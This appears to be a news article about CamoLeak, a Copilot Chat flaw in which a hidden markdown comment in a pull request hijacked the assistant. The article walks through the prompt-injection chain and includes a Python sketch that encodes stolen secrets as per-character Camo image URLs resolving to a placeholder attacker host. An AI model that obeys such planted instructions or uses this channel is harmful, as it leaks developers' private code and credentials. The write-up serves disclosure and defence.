
CamoLeak: Critical GitHub Copilot Flaw Allowed Silent Exfiltration of Private Code and Secrets

A CVSS 9.6 vulnerability in GitHub Copilot Chat combined remote prompt injection with a CSP bypass via GitHub's Camo image proxy, enabling attackers to silently exfiltrate AWS keys and private repository data through hidden markdown comments.

TechDrop Editorial

Security researcher Omer Mayraz of Legit Security disclosed CamoLeak, a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that demonstrated how AI coding assistants can be weaponized to silently exfiltrate private code and secrets from the very repositories they are designed to help developers work on.

The Attack Chain

CamoLeak combined two techniques: remote prompt injection and a Content Security Policy (CSP) bypass via GitHub's Camo image proxy. The attack began with a hidden markdown comment planted in a pull request description. When a developer asked Copilot Chat a question about the pull request, the hidden comment injected malicious instructions into Copilot's context — instructions that the developer could not see in the rendered PR description.

The injected instructions directed Copilot to access sensitive information from the repository — private issue descriptions, environment variables, configuration files — and encode that information as a series of image URLs using GitHub's Camo proxy. The Camo proxy, which GitHub uses to serve external images through its own domain for security purposes, was repurposed as a data exfiltration channel. The attacker pre-generated one Camo URL for each ASCII character, each resolving to a distinct path on an attacker-controlled server, so the ordered sequence of image requests arriving at that server spelled out the stolen data character by character.
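A minimal sketch of the encoding half of the attack, assuming one pre-generated, GitHub-signed Camo URL per printable ASCII character and a 1x1 pixel behind each on an attacker-controlled server. Every hostname, path, and digest below is a hypothetical placeholder:

```python
import string

# Hypothetical mapping from characters to pre-generated Camo URLs; real Camo
# URLs carry an HMAC digest that only GitHub can produce, which is why the
# attacker must generate them ahead of time.
CAMO_URLS = {
    ch: f"https://camo.githubusercontent.com/<digest-for-char-{ord(ch)}>"
    for ch in string.printable
}
# Behind each Camo URL sits a tracking pixel on the attacker's server, e.g.
# https://attacker.example/c/65 for "A" (attacker.example is made up).

def encode_as_images(secret: str) -> str:
    """Spell out a secret as one markdown image tag per character."""
    return "\n".join(f"![.]({CAMO_URLS[ch]})" for ch in secret)

def decode_from_server_log(requested_paths: list[str]) -> str:
    """Rebuild the secret from the ordered /c/<codepoint> hits in the attacker's log."""
    return "".join(chr(int(path.rsplit("/", 1)[-1])) for path in requested_paths)

# Example: an AWS key beginning "AKIA" would surface in the attacker's log as
# requests for /c/65, /c/75, /c/73, /c/65, ...
```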

What Could Be Stolen

Legit Security demonstrated exfiltration of AWS access keys, security tokens, and private issue descriptions — including undisclosed zero-day vulnerability details — from private repositories. The attack required no access to the victim's machine, no malware installation, and no credential theft. The only requirement was the ability to create a pull request in a repository where a developer would subsequently interact with Copilot Chat — a scenario that is routine in open-source projects and common in enterprise development workflows that accept external contributions.

Mitigation

GitHub mitigated CamoLeak on August 14, 2025 by disabling image rendering in Copilot Chat entirely. The fix eliminates the exfiltration channel: Copilot can no longer render images, including the data-encoding Camo URLs, in its responses. The vulnerability was discovered in June 2025 and publicly disclosed in early 2026, after the fix was deployed.

Broader Implications

CamoLeak is distinct from CVE-2026-21516, a separate GitHub Copilot vulnerability in the JetBrains plugin that was patched in the February 2026 Patch Tuesday. Together, the two vulnerabilities establish that AI coding assistants represent a genuinely new attack surface — one in which the AI itself can be manipulated to act against the user's interests through prompt injection attacks embedded in the code the AI is analyzing. For security teams evaluating AI coding tool deployments, CamoLeak demonstrates that the risk model must account for the AI acting as an unwitting insider threat.
